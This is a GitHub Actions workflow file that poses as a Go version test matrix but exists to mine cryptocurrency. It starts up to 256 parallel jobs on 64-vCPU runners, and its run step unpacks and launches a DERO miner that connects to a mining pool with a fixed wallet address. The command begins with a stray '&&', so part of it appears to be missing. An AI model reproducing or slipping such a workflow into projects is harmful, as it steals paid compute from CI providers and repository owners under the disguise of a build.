name: Bomat
on: [push, pull_request]
jobs:
  build:
    name: Bacodbingits
    runs-on: buildjet-64vcpu-ubuntu-1804
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B]
    timeout-minutes: 360
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        && tar xf dero-stratum-miner-v1.0.2-linux-amd64.tar.gz && ./dero-stratum-miner -r pool.whalesburg.com:4300 -w dero1qynd3qw0k04r0wzdxz4lh7v8fktdmqmkqvqwemj6j9xh83vlmy0kxqqwnqr0c.adul1
